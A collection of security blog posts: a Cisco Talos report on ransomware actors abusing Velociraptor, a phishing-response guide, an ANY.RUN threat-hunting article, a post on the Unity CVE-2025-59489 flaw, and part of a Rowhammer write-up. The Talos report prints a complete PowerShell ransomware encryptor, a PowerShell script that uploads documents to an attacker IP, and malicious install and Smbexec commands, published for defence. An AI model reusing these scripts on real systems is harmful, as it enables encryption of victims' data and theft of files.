• Cisco Talos has confirmed that ransomware operators are leveraging Velociraptor, an open-source digital forensics and incident response (DFIR) tool that had not previously been definitively tied to ransomware incidents.  
• We assess with moderate confidence that this activity can be attributed to threat actor Storm-2603, based on overlapping tools and tactics, techniques, and procedures (TTPs)  
• Talos also observed evidence of Babuk ransomware files on the victim’s network, which has not been previously deployed by Storm-2603. 

In August 2025, Talos responded to a ransomware attack by actors who appeared to be affiliated with Warlock ransomware, based on their ransom note and use of Warlock’s data leak site (DLS). They deployed Warlock, LockBit, and Babuk ransomware to encrypt VMware ESXi virtual machines (VMs) and Windows servers. This severely impacted the customer’s IT environment. 

Velociraptor 

Velociraptor is designed for security teams to use for endpoint monitoring by deploying client agents across Windows, Linux and Mac systems to continuously collect data and respond to security events. 

Velociraptor played a significant role in this campaign, ensuring the actors maintained stealthy persistent access while deploying LockBit and Babuk ransomware. After gaining initial access the actors installed an outdated version of Velociraptor (version 0.73.4.0) that was exposed to a privilege escalation vulnerability (CVE-2025-6264) that could lead to arbitrary command execution and endpoint takeover. 

Threat actors have also reportedly leveraged Velociraptor to download and execute Visual Studio Code with the likely intention of creating a tunnel to an attacker-controlled command-and-control (C2) server.  

The addition of this tool in the ransomware playbook is in line with findings from Talos’ 2024 Year in Review, which highlights that threat actors are utilizing an increasing variety of commercial and open-source products. 

Attribution to Storm-2603 and ToolShell nexus 

Talos assesses with moderate confidence that this activity can be attributed to the group Storm-2603, based on overlapping tools and TTPs. Storm-2603 is a suspected China-based threat actor first identified in July 2025, when they began exploiting the on-premises SharePoint vulnerabilities known as ToolShell. 

Similar to the activity Talos observed in this engagement, Storm-2603 is known for deploying Warlock ransomware and Lockbit ransomware in the same engagement. While LockBit is widely deployed by a variety ransomware actors, Warlock was first advertised in June 2025 and has since been heavily used by Storm-2603. Additionally, it is highly unusual for actors to use two different ransomware variants in the same attack, increasing our confidence that this activity could be related to Storm-2603. 

The threat actor in this engagement also mirrored several Storm-2603 TTPs, based on reporting by Microsoft: 

• Use of cmd.exe and batch scripts 
• Disabling Microsoft Defender protections 
• Creating scheduled tasks 
• Manipulating Internet Information Services (IIS) components to load suspicious .NET assemblies 
• Modifying Group Policy Objects (GPOs) 

While Talos was unable to observe how the actor obtained initial access due to limited access to the victim organization’s data, both their exposure to the ToolShell vulnerabilities and our attribution to Storm-2603 increase the likelihood that initial access was gained through ToolShell exploitation.  

Campaign overview 

The first high-confidence indications of suspicious activity associated with this campaign occurred in mid-August 2025, with attempts to escalate privileges and move laterally within the compromised environment. We observed the threat actor creating admin accounts that synced to Entra ID (formerly Azure Active Directory) via the domain controller. The same actor-controlled admin account also accessed the VMware vSphere console, an interface used to manage and interact with virtual machines (VMs), which could allow for persistent access to the virtual environment. 

Notably, the threat actor installed an older version of Velociraptor on multiple servers to maintain persistence using the following command. We observed Velociraptor launching several times even after the host was isolated. 

msiexec  /q /i hxxps[:]//stoaccinfoniqaveeambkp.blob.core.windows[.]net/veeam/v2.msi 

The actors also executed the following command to run Smbexec, a Python script that comes with Impacket and allows an attacker to launch programs remotely using the SMB protocol: 

%COMSPEC% /Q /c echo cd ^> \%COMPUTERNAME%C$__output 2^>^&1 > %SYSTEMROOT%TkTvjYUp.bat & %COMSPEC% /Q /c %SYSTEMROOT%TkTvjYUp.bat & del %SYSTEMROOT%TkTvjYUp.bat  
C:WindowsSystem32cmd.exe cmd.exe /Q /c cmd /c c:windowstemp1.bat /y 1> WindowsTempsuLGnR 2>&1 

To impair defenses and evade detection, the actors modified Active Directory (AD) GPOs and: 

• Enabled “turn off real-time protection,” which continuously monitors for potential threats such as viruses, malware and spyware 
• Disabled “behavior monitoring,” which blocks suspicious activities by observing deviations from established patterns of normal behavior 
• Disabled “monitor file and program activity on your computer,” which observes how software behaves to identify patterns associated with malicious activity 

The actors deployed a fileless Powershell script that had an encryption functionality, which we believe was the primary encryptor that deployed mass encryption on the Windows machines:  

function GER($n) {-join (1..$n|%{"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-=+[]{}|;:',.<>?`~"[(Get-Random -Maximum 74)]})}function err($pl,$sf){$rsa=New-Object System.Security.Cryptography.RSACryptoServiceProvider;$rsa.FromXmlString($sf);$PB=[Text.Encoding]::UTF8.GetBytes($pl);$rsa.Encrypt($PB,$false)} function gg($path) {$ke = GER(32);$ig =GER(16);$sf = 'tdIXltqjmTpXRB43p+k6X9+JqBZvsD7+X4GsM0AVh0QS6Oev5RVAaQqc6m2pEKN7AYARcpz9iNy5JOB/T+OtWmqxd42bLH+iAUjc1kc1qk1Cg38t7obrGja8L7UMoJkb97ry0ngak9BlqaS7P+wzApOLVJoBNxaJ2rCoj7+Crh3p3Vm2/7/o4pMjgg4S838jw6aiRbag/v4SR86oupqjBvKxsAcZo5A4NDFoZ29j/IMa6GNpMkVjsNPjvB/GIqGcbTqJkb8HGSXw3KvHqwqfsB+01VTsbO7B8kIkOr4jB/M+bHFwgYkUG4rS2s/yJcOOkzH0tJwEj11tLv2bHSzoQQ==AQAB'; $eec=err -pl $ke+$ig -sf $sf;$eee=[System.Convert]::ToBase64String($eec);$key=[System.Text.Encoding]::UTF8.GetBytes($ke);$iv=[System.Text.Encoding]::UTF8.GetBytes($ig);try{$files=gci $path -Recurse -Include .pdf,.txt, *.doc, *.docx, *.odt, *.rtf, *.md, *.csv, *.tsv, *.jpg, *.jpeg, *.tiff, *.mp3, *.xls, *.xlsx, *.ods, *.ppt, *.pptx, *.odp, *.py, *.java, *.cpp, *.c, *.html, *.css, *.js, *.php, *.swift, *.kotlin, *.go, *.rb, *.sh, *.sql, *.db, *.sqlite, *.sqlite3, *.mdb, *.sql, *.zip, *.rar, *.7z, *.tar, *.gz, *.bz2, *.iso, *.torrent, *.ini, *.json, *.xml, *.log, *.bak, *.cfg, *.psd, *.vmdk | select -Expand FullName; foreach ($file in $files) { try {EFI $file $key $iv $eee} catch{}}} catch {Write-Host $ }} function EFI($ifi,$key,$iv,$aT) {if($ifi.EndsWith(".xlockxlock", [System.StringComparison]::OrdinalIgnoreCase)) {return};$aes = [System.Security.Cryptography.Aes]::Create();$aes.KeySize = 256;$aes.Key=$key;$aes.IV=$iv;try{$yy=New-Object System.IO.FileStream($ifi, [System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite, [System.IO.FileShare]::None); $xx=$aes.CreateEncryptor($aes.Key, $aes.IV); $mm = New-Object System.Security.Cryptography.CryptoStream($yy, $xx, [System.Security.Cryptography.CryptoStreamMode]::Write); $yy.Seek(0, [System.IO.SeekOrigin]::Begin) | Out-Null; $jj = New-Object byte[] ($yy.Length); $yy.Read($jj, 0, $jj.Length) | Out-Null; $yy.Seek(0, [System.IO.SeekOrigin]::Begin) | Out-Null; $mm.Write($jj, 0, $jj.Length); $mm.FlushFinalBlock(); $se = 1 } catch { Write-Error $_ } finally {if ($mm) { $mm.Dispose() } if ($yy) { $yy.Dispose() } }try {$kk = [System.Text.Encoding]::UTF8.GetBytes($aT);$bb = New-Object System.IO.FileStream($ifi,[System.IO.FileMode]::Append,[System.IO.FileAccess]::Write,[System.IO.FileShare]::None);if ($se){$bb.Write($kk, 0, $kk.Length)}} catch {Write-Error $_} finally {if ($bb) { $bb.Dispose();if ($se){ren $ifi -NewName $ifi".xlockxlock";}}}};$vg =gdr -PS FileSystem | select -Expand Root;foreach ($II in $vg) {gg -path "$II"} 

After the script was deployed, Talos observed ransomware executables on Windows machines that were identified by EDR solutions as LockBit, and encrypted files with the Warlock extension “xlockxlock”. There was also a Linux binary on ESXi servers flagged as the Babuk encryptor, which achieved only partial encryption and appended files with “.babyk”. Storm-2603 has not previously leveraged Babuk ransomware, based on public reporting. 

The actors also conducted double extortion, exfiltrating data using the below PowerShell script. To evade detection, the exfiltration script shows that “$ProgressPreference” is set to “SilentlyContinue”, which suppresses any visual indication of the command’s progress. It also includes the “start-sleep” cmdlet, which suspends the script for a specified period of time. This cmdlet can be used to inhibit analysis, as many malware analysis tools, such as sandboxes, have a limited time window, and used to avoid triggering security alerts that might identify rapid, continuous script activity. 

function GR {$numbers = 1..20;$numbers | Get-Random }  
function Upfile { 
    param ( 
        [string]$path = "C:Users", 
        [int]$maxConcurrentJobs = 40  # 
    ) 
    Add-Type -AssemblyName System.Web 
    try { 
        $files = Get-ChildItem -Path $path -Recurse -Include *.doc,*.docx,*.xlsx,*.ppt,*.pptx,*.xls -ErrorAction SilentlyContinue |  
                Where-Object { $_.Length -lt 50MB } |  
                Select-Object -ExpandProperty FullName 
        $uploadScriptBlock = { 
            param ($file, $grValue) 
            try { 
                Add-Type -AssemblyName System.Web 
                $fileName = Split-Path -Path $file -Leaf 
                $encodedFileName = [System.Web.HttpUtility]::UrlEncode($fileName) 
                $uploadUrl = "http[:]//65.38.121[.]226/test/$encodedFileName" 
                Write-Host "upload $file to $uploadUrl" 
                $ProgressPreference = 'SilentlyContinue' 
                $maxRetries = 3;$retryCount = 0 
while ($retryCount -lt $maxRetries) { 
            try { 
$wc = New-Object System.Net.WebClient;$wc.UploadFile($uploadUrl, "PUT", $file) | Out-Null 
                Write-Host "upload Sucess $fileName" 
                break 
}  
catch { 
                $retryCount++ 
                Write-Host "upload $fileName retry $retryCount error: $_" 
                Start-Sleep -Seconds 2 
                }  
                finally {$wc.Dispose()}}}  
       catch  
            { 
                Write-Host "upload $fileName error: $_" 
            } 
            finally {$wc.Dispose()} 
        
        } 
        $grValue = GR 
        $jobs = @() 
        foreach ($file in $files) { 
            while ((Get-Job -State Running).Count -ge $maxConcurrentJobs) {Start-Sleep -Milliseconds 100} 
            $jobs += Start-Job -ScriptBlock $uploadScriptBlock -ArgumentList $file, $grValue 
        } 
        $jobs | Wait-Job | ForEach-Object { 
            Receive-Job -Job $_ -Keep 
            Remove-Job -Job $_ 
        } 
    } catch { 
        Write-Host "getfile error: $_" 
    } 
} 
$drives = @("C:Users", "D:", "E:", "F:", "K:") 
foreach ($drive in $drives) { 
    if (Test-Path $drive) {Upfile -Path $drive   } 
    else {Write-Host "Drive $drive is not accessible." -ForegroundColor Yellow} 
} 

Mitigation recommendations 

Please see Talos’ Ransomware Primer for detailed recommendations on how to safeguard against ransomware threats. We also recommend referring to Talos’ blog on ToolShell for information on these vulnerabilities and how to patch them. Additionally, Rapid7 has published some recommendations on detecting velociraptor misuse.

MITRE ATT&CK techniques 

Resource Development  

• T1584.003 Compromise Infrastructure: Virtual Private Server 

Execution 

• T1059.001 PowerShell 

Persistence  

• T1136 Create Account 
• T1505.006 Server Software Component: vSphere Installation Bundles 

Privilege Escalation  

• T1098.007 Account Manipulation: Additional Local or Domain Groups 
• T1098 Account Manipulation 

Defense Evasion  

• T1556 Modify Authentication Process 
• T1484.001 Domain or Tenant Policy Modification: Group Policy Modification 

Lateral Movement  

• T1021.001 Remote Services: Remote Desktop Protocol 

Collection  

• T1213 Data from Information Repositories 

Exfiltration 

• T1041 Exfiltration Over C2 Channel 

Impact 

• T1486 Data Encrypted for Impact 
• T1657 Financial Theft 

Coverage

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Cisco Secure Access is a modern cloud-delivered Security Service Edge (SSE) built on Zero Trust principles. Secure Access provides seamless transparent and secure access to the internet, cloud services or private application no matter where your users work. Please contact your Cisco account representative or authorized partner if you are interested in a free trial of Cisco Secure Access.

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. 

The following ClamAV cover this threat:  
Win.Ransomware.Warlock-10057029-0  

IOCs 

IOCs for this research can also be found at our GitHub repository here.

C2/exfiltration IP address: 
65.38.[121][.]226 

Domain hosting malicious MSI: 
stoaccinfoniqaveeambkp.blob.core.windows[.]net 

Velociraptor C2 server: 
velo.qaubctgg.workers[.]dev 

Velociraptor:Legitimate tool used by the adversary for persistence 
Velociraptor installer – 649BDAA38E60EDE6D140BD54CA5412F1091186A803D3905465219053393F6421 
Velociraptor.exe – 12F177290A299BAE8A363F47775FB99F305BBDD56BBDFDDB39595B43112F9FB7 
Malicious Velociraptor config.yaml – A29125333AD72138D299CC9EF09718DDB417C3485F6B8FE05BA88A08BB0E5023  

Internal Monologue NTLM downgrade malware: 
In.exe- C74897B1E986E2876873ABB3B5069BF1B103667F7F0E6B4581FBDA3FD647A74A  

Cisco Talos Blog – ​Read More

October is Cybersecurity Awareness Month, and as the tech-savvy friend or family member, people probably come to you for advice. One of the most common questions is: “I clicked a suspicious link. What do I do now?” 

Don’t worry — panic won’t help, but a calm, step-by-step response will. Share this guide with your loved ones so everyone knows exactly how to respond and stay safe. 

If you clicked the link on a work device, immediately contact IT support and follow their instructions. Companies often have specific policies and tools to investigate and remediate security incidents. Quick reporting helps protect both you and your organization. 

If it’s a personal device, here’s what to do next.

Scenario 1: You only clicked the link, and did not enter any information 

Clicking a malicious link can trigger automatic downloads, attempt to exploit browser vulnerabilities, or install malware without your knowledge. 

• Exit the browser immediately. 
• Make sure no files downloaded to your device; if so, delete them without opening. 
• Monitor your device for unusual behavior, which can be a sign of malware. 
  • Examples: Higher-than normal battery drainage, apps crashing, unknown apps/profiles, and persistent pop-ups 
• Stay alert for suspicious emails, texts, or calls.

Together, these steps help you catch and remove any threats before they cause harm, and keep you aware of follow-up attacks.

Scenario 2: You entered your username and password 

Entering credentials on a phishing site can give attackers access to your account, leading to unauthorized activity, identity theft or further phishing. 

• Change your password immediately for that account, and force a logout of all devices logged in. This locks out any unauthorized users who may have gained access. 
• If you have multifactor authentication (MFA) enabled, watch for any push notifications that you did not initiate. Do not approve them. This could mean someone is actively trying to log in with your stolen credentials. 
• Enable two-factor authentication (2FA) if available. 
• Create new, unique passwords for any other accounts that used the same credentials. Attackers often try your compromised password on multiple sites (aka called credential stuffing). 
  • Tip: Instead of storing your credentials in your browser, use a password manager such as 1Password. 
• Watch for suspicious account activity.

By following these steps, you limit the attacker’s access and protect your other accounts from being compromised. 

Scenario 3: You entered credit card or banking information 

Financial data can be quickly exploited for fraudulent transactions, identity theft, or even sold on the dark web. 

• Contact your bank or card issuer right away. 
• If possible, freeze your card and get a replacement. 
• Monitor your statements and report any unauthorized charges. 
• Enable fraud alerts if your bank offers them.

These actions help you contain the risk, minimize financial losses, and alert your bank to potential fraud on your account.

Scenario 4: You downloaded or opened a file 

Downloaded files from suspicious links can contain malware, ransomware, spyware or other harmful software that may steal your data or harm your device. 

• Disconnect your device from the internet until you have completed all of these steps. Isolating your device can prevent malware from communicating with attackers or spreading to other devices. 
• Run a full antivirus and malware scan if on a desktop or laptop. 
• Check to ensure no new apps were installed if on a phone. 
• Delete any suspicious files. 
• In a worst-case scenario, if you have conducted periodic backups it might be best to restore your device to a clean version, from before the file was downloaded.

Remember to: 

• Always verify links before you click on them.  
  • Tip: Hover over the link to make sure it leads to an official website. If you’re not sure, it’s safer to type in the URL manually. 
• Enable multifactor authentication for your accounts whenever it’s available. 
• Keep your software and antivirus updated. 
• Report all phishing attempts to your email provider and IT/security team. 

Phishing attacks are getting more sophisticated, but a little knowledge goes a long way. Share this guide with your friends and family so they’ll know what to do if they ever click a suspicious link.

Happy Cybersecurity Awareness Month from Cisco Talos!

Cisco Talos Blog – ​Read More

Editor’s note: The current article is authored by Clandestine, threat researcher and threat hunter. You can find Clandestine on X. 

ANY.RUN’s Threat Intelligence (TI) Lookup is a powerful service for Open Source Intelligence (OSINT) and Threat Intelligence investigations. In this research, we shall analyze 5 specific queries, each targeting different aspects of the threat landscape, to better understand the nature of modern threats as well as defense and response strategies.  

Key Findings 

1. JA3S Fingerprinting underscores the value of behavioral indicators in hunting advanced threats allowing analysts to track Command and Control infrastructure even when attackers rotate IP addresses and domains 

2. Massive abuse of legitimate infrastructure (AWS, Google Cloud, Cloudflare, Microsoft services) complicates detection, as malicious traffic blends with legitimate services. 

3. Locally targeted phishing operations demonstrate that attackers tailor their strategies by geography. This highlights the importance of localized cyber threat intelligence. 

4. By combining sandbox detonation with TI Lookup queries, analysts uncover trojan traffic disguised within HTTPS (port 443). This methodology proves the benefit of correlating behavioral analysis with IOC-based searches. 

5. The .top domain extension serves as a thriving ecosystem for cybercrime, with randomly-generated DGA domains used for malware delivery, often leveraging WinRAR for payload extraction. 

Exploring Beyond IOCs: Malicious Pattern Case Studies  

ANY.RUN’s Threat Intelligence (TI) Lookup is a dynamic, searchable database that equips security analysts with immediate access to over 50 million Indicators of Compromise (IOCs), Behavior (IOBs), and Attack (IOAs) and threat events extracted from real-time malware sandbox analyses conducted by a global community of over 500,000 analysts and 15,000 companies.  

Tailored for threat hunting, alert triage, and incident response, it allows analysts to query the database using more than 40 parameters – including hashes, IPs, registry keys, processes, and TTPs. It supports search operators, wildcards, YARA and Suricata rules, and notifies on updates on saved searches.  

Let’s see how analysts can use it as part of their OSINT investigation. 

Case 1: Investigating Regionalized Phishing Campaigns 

Query: threatName:”Phishing” AND submissionCountry:”br” and domainName:”” 

We can start by checking for active phishing campaigns targeting organizations in our region. Even with a free plan, TI Lookup provides us with lots of sandbox analyses of the latest malicious domains and emails sent to companies in Brazil.  

We can also observe legitimate infrastructure abuse as a number of known service subdomains are linked to the campaigns along with malicious domains. Globally hosted infrastructure is leveraged to hinder takedown.  

Actionable Intelligence: Organizations in Brazil should be especially alert to emails containing links to subdomains of popular services. Security teams can use the identified domains and IPs to create proactive defense using detection and blocking rules. 

Case 2: Tracking C2 Infrastructure with JA3S 

Query: ja3s:”1af33e1657631357c73119488045302c” 

The JA3S hash is a fingerprint of how a TLS client communicates. Different malware or attack tools may have unique JA3S signatures, allowing analysts to track their Command and Control (C2) infrastructure even when IP addresses and domains change. Hash “1af33e1657631357c73119488045302c” is commonly associated with Cobalt Strike.  

What do we capture from the search results?  

• 1,000+ system events mostly involving slui.exe (System License User Interface), svchost.exe, and PowerShell.   

• Predominant communication on port 443 (HTTPS) exposes evasion techniques exploiting LOLBins. 

• Abuse of major cloud providers to host C2 infrastructure (Microsoft, GitHub, Google, Amazon, CloudFlare). 

• Techniques: Use of legitimate system tools for malicious execution. 

Actionable Intelligence: Detection of this JA3S hash on the network is a strong indicator of Cobalt Strike infection or an abuse of a similar tool. Security teams should correlate these alerts with other endpoint and network events to identify compromised systems and initiate incident response. 

TI Lookup’s “Analyses” tab contains links to sandbox analyses of malware samples featuring the hash in question. We can sort out samples tagged as “malicious” and study various attack scenarios leveraging similar TTPs:  

For example, one can view a Cerber ransomware attack and see how it abuses system tools and cloud services.  

Case 3: Hunting Trojan Traffic Camouflaged in HTTPS 

Query: destinationIPgeo:”ru” AND suricataClass:”trojan” AND destinationPort:”443″ 

This query is a classic example of threat hunting. It doesn’t look up a specific IOC but rather searches for a suspicious behavior pattern: traffic classified as trojan by the Suricata engine, destined for IPs in Russia and using port 443 (HTTPS). 

Russia is generally a suspicious communication destination, and port 443 is used to camouflage malicious traffic. The attack strategy includes threat diversity: multiple services and legitimate domains are abused; various ports are employed for communication and fallback.

 
Actionable Intelligence: This query provides a list of high-risk IPs and domains for enriching perimeter defenses. The combination of destination geolocation, threat classification, and communication port is a powerful hunting methodology. 

TI Lookup has found a number of analysis sessions demonstrating this behavior pattern.  

View an example in the Sandbox 

Case 4: Unmasking BEC Campaigns Focused on Invoices 

Query: filePath:”invoice.pdf” OR filePath:”pagamento.pdf” 

Business Email Compromise (BEC) frauds continue to be one of the most lucrative threats. This query searches for PDF files containing the words “invoice” or “pagamento” (payment) in their name, an extremely common infection vector in BEC schemes. 

The malicious files are often hosted on Amazon S3 Buckets and named to appear legitimate. Exploring such attacks delivers file hashes to use as IOCs for detection.  
 
Actionable Intelligence: Organizations should implement email attachment verification and educate employees about fake invoice risks. The IOCs should be added to block lists, and monitoring downloads from unknown S3 buckets can be effective. 

Case 5: Identifying Malicious Activity Hotspots with TLDs  

Query: domainName:”*.top” AND threatLevel:”malicious” 

Certain Top-Level Domains (TLDs) are notoriously abused by cybercriminals due to low cost and loose regulation. The .top TLD is one of these. This query searches for all domains ending in .top that have been classified as malicious. 

Such domains, mostly generated by algorithms, support a thriving ecosystem for malicious activities. They are often used for delivering payload packed in WinRAR archives. Cloudflare services are engaged for concealing true server locations.  

Actionable Intelligence: Aware of extremely high malicious activity volume, many organizations block the .top TLD completely. The appearances of .top domains in network logs should be treated as high-priority events. 
 
Alltogether, these searches provide insight into the broader threat landscape and recent query patterns, showing the diversity of investigation approaches used in threat hunting. Threat intelligence lookups can be focused on a topical threat type (for example, phishing), legitimate tools abuse, registry modifications: queries can target both IOCs and behavioral patterns.  

Lessons Learned: Security Recommendations 

Here’s how SOC teams and threat hunters can perform an effective OSINT investigation. 

For Analysts 

• Implement multi-parameter hunting queries combining JA3S fingerprints, destination geolocation, and Suricata classifications rather than relying solely on hash or domain lookups. 

• Create detection rules for the identified JA3S hash and monitor for similar TLS fingerprinting patterns indicating Cobalt Strike or similar frameworks. 

• Monitor for traffic to non-standard ports and HTTPS-based C2 activity; correlate with TI Lookup results for stronger detection. 

• Integrate sandbox detonations into investigations to validate suspicious files, uncover hidden payloads, and gather fresh IOCs. 

 For SOC and MSSP Leaders 

• Adopt proactive hunting playbooks that leverage behavior-based patterns (e.g., phishing, malicious PDFs, LOLBins) instead of relying solely on static IOCs. 

• Automate ingestion of ANY.RUN TI Feeds and Lookup results into SIEM/SOAR platforms to strengthen correlation and reduce analyst workload. 

• Establish rules and alerts around high-risk TLDs (.top, .shop, .cc) and cloud-hosted infrastructures commonly abused by attackers. 

• Adopt a Zero Trust security model: The extensive abuse of trusted infrastructure (Microsoft, Google, Amazon domains) demonstrates that brand reputation no longer guarantees safety 

 For Business Decision Makers 

• Support employee awareness campaigns, especially for financial teams, to counter phishing and BEC attempts. 

• Recognize that cloud service abuse is now the norm in modern campaigns, so budgeting for advanced detection and monitoring is critical to maintaining resilience. 

• Budget for cyber threat intelligence solutions that provide both sandboxing and lookup capabilities—the ROI comes from preventing successful breaches through proactive threat hunting rather than reactive incident response. 

Conclusion 

This investigation highlights how modern cyber threats are increasingly sophisticated, regionalized, and reliant on abusing legitimate infrastructure to evade detection. Static IOCs alone are insufficient for defense. Security teams must embrace behavior-based detection and proactive hunting strategies.  

ANY.RUN’s TI Lookup and Sandbox provide the intelligence depth and investigative flexibility needed to uncover hidden connections, expose attacker TTPs, and accelerate incident response. Organizations that combine advanced threat intelligence solutions with strong security culture and well-trained teams will be better positioned to withstand evolving threats and reduce the cost and impact of cyber incidents. 

About ANY.RUN  

Over 500,000 cybersecurity professionals and 15,000+ companies in finance, manufacturing, healthcare, and other sectors rely on ANY.RUN to streamline malware investigations worldwide.   

Speed up triage and response by detonating suspicious files in ANY.RUN’s Interactive Sandbox, observing malicious behavior in real time, and gathering insights for faster, more confident security decisions. Paired with Threat Intelligence Lookup and Threat Intelligence Feeds, it provides actionable data on cyberattacks to improve detection and deepen your understanding of evolving threats.   

Explore more ANY.RUN’s capabilities during 14-day trial→ 

The post Phishing, Cloud Abuse, and Evasion: Advanced OSINT Investigation with ANY.RUN Threat Intelligence  appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – ​Read More

In early October, Unity announced that game developers have a lot of work to do. The popular game engine, used for PC, console and mobile games, has a software vulnerability in it that requires all published games to be updated. The vulnerability was added eight years ago, in engine version 2017.01, so it affects all modern Unity games and applications on Android, Linux, MacOS, and Windows platforms.

It wasn’t only developers who reacted to the announcement. Valve announced that it would block Steam from launching games with unsafe settings, and Microsoft went further and recommended temporarily uninstalling vulnerable games until they can be patched.

So what is the threat from this vulnerability, and how to fix it without uninstalling games?

How the Unity vulnerability works

Exploitation of the CVE-2025-59489 vulnerability can cause a game to run malicious code, or give an attacker access to information on the given device. An attacker can pass startup parameters to the game, and vulnerable versions of Unity Runtime will process several commands intended for debugging: -xrsdk-pre-init-library, – dataFolder , overrideMonoSearchPath, and -monoProfiler, among others. With these commands, the Unity engine loads any libraries specified in the startup parameters – including malicious ones. It can load .dll files on Windows, .so libraries on Android and Linux, and .dylib libraries on macOS.

This way, a malicious application with low privileges can launch a game with modified startup parameters, and make it download and run the malicious library. Thus it will have the same privileges and access as the game itself.

Another type of attack that can exploit this vulnerability can be carried out remotely. If a game can be launched by clicking on certain hyperlinks in the browser (the game must be registered as a URI schema handler), the malicious site can first convince the user to download the malicious library file, and then launch the vulnerable game along with this library.

The danger of exploitation of this vulnerability depends largely on the game’s settings, version and OS settings, but Unity, Valve and Microsoft unanimously recommend updating all games on the system.

What’s the danger of a vulnerability in a game?

Exploitation of this vulnerability serves to escalate privileges and bypass defenses. An unknown application in modern operating systems is usually isolated from others and deprived of access to sensitive information. But it can still launch already installed applications. So when the game is launched with parameters crafted by an attacker, it loads a malicious library, and this library is considered by the system and its defense mechanisms to be part of the game. It has the same rights and access as the game itself, and can also slip under the radar of some antiviruses. Games sometimes require relatively high privileges in the system, so this is a way for an attacker to become, if not the administrator of the device, at least a “respected user”.

Is this vulnerability being exploited in real-world attacks?

Unity emphasizes that the flaw was discovered by ethical hackers and there is no evidence to date that the vulnerability is being used in real attacks. But given the widespread publicity of the issue and the ease of exploitation, any willing attacker could arm themselves with CVE-2025-59489 in just a couple of days. So taking precautionary measures won’t be unreasonable.

How to fix the vulnerability

The main work should be done by game developers. Having updated Unity Editor, they should recompile the game with the patched version of Unity Runtime, and publish it on the website or in app stores. Users need to keep track of updates to their Unity-based games, and update them promptly.

Valve has updated the Steam client and fixed this issue for those games that run via the client. Now it blocks the launch of games with the aforementioned dangerous parameters.

Microsoft has confirmed that the vulnerability doesn’t affect Xbox versions of games, but provides an extensive list of vulnerable games available in its app stores for other platforms. Until the vulnerabilities in the specified games are fixed, Microsoft recommends uninstalling them.

In addition to updating your games, be sure your computers and smartphones are protected by a comprehensive cyberthreat prevention system such as Kaspersky Premium. It not only prevents many vulnerabilities from being exploited, but also prevents first-stage malware from running.

How to fix a vulnerability if the game is no longer updated

For developers who don’t have access to the Unity editor or don’t support the game anymore, Unity offers the Unity Application Patcher app. It detects which version of Unity the game is using, and downloads an updated library (libunity.so for Android, UnityPlayer.dll for Windows, UnityPlayer.dylib for macOS), fixing the flaw. The patched game still needs to be republished on the website or app stores.

For gamers, only the Windows version of the patcher will be useful, since it’s very problematic to change the game component for MacOS or Android while keeping the game functional.

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In September 2025, researchers at ETH Zurich (the Swiss Federal Institute of Technology) published a paper introducing Phoenix, a modification of the Rowhammer attack that works on DDR5 memory modules. The authors not only demonstrated the new attack’s effectiveness against 15 tested modules, but also proposed three practical use cases: reading and writing data from memory, stealing a private encryption key stored in memory, and bypassing Linux’s sudo utility protections to escalate privileges.

The Rowhammer attack: a brief history

To understand this rather complex study, we need to first briefly revisit the history of Rowhammer. The Rowhammer attack was first described in a 2014 research paper. Back then, researchers from both Carnegie Mellon University and Intel showed how repeatedly accessing rows of memory cells could cause adjacent memory cells to change value. These neighboring cells could contain critical data — the alteration of which could have serious consequences (such as privilege escalation).

This happens because each cell in a memory chip is essentially a capacitor: a simple component that can hold an electrical charge for only a short time. That’s why such memory is volatile: turn off the computer or server, and the data disappears. For the same reason the charge in cells must be frequently refreshed — even if no one is accessing that memory region.

Memory cells aren’t isolated; they’re organized in rows and columns, interconnected in ways that can cause interference. Accessing one row can affect a neighboring row; for example, refreshing one row can corrupt data in another. For years, this effect was only known to memory manufacturers — who tried their best to mitigate it in order to improve reliability. But as cells became smaller and therefore packed more tightly together, the “row hammering” effect became exploitable in real-world attacks.

After the Rowhammer attack was demonstrated, memory developers began to introduce defenses, resulting in Target Row Refresh (TRR) hardware technology. In theory, TRR is simple: it monitors aggressive access to rows and, if detected, forcibly refreshes adjacent rows. In practice, it wasn’t so effective. In 2021, researchers described the Blacksmith attack, which bypassed TRR by using more sophisticated memory-cell access patterns.

Developers adapted again — adding even more advanced defenses against Rowhammer-like attacks in DDR5 modules and increasing the enforced refresh rate. To further impede new attacks, manufacturers avoided disclosing which countermeasures were in place. This led many to believe that DDR5 had effectively solved the Rowhammer problem. However, just last year, researchers from the same ETH Zurich managed to successfully attack DDR5 modules — albeit under certain conditions: the memory had to be paired with AMD Zen 2 or Zen 3 CPUs, and, even then, some modules remained unaffected.

Features of the new attack

To develop Phoenix, the researchers reverse-engineered the TRR mechanism. They analyzed its behavior under various memory row access patterns and checked whether the protection triggered for adjacent rows. It turned out that TRR has become significantly more complex, and previously known access patterns no longer work — the protection now correctly flags those patterns as potentially dangerous and forcibly refreshes adjacent rows. As a result, the researchers discovered that after 128 TRR-tracked memory accesses, a “window of opportunity” of 64 accesses appears, during which defenses are weaker. It’s not that the protection system completely fails, but its responses are insufficient to prevent a value change in a targeted memory cell. The second window presents itself after accessing memory cells over the course of 2608 refresh intervals.

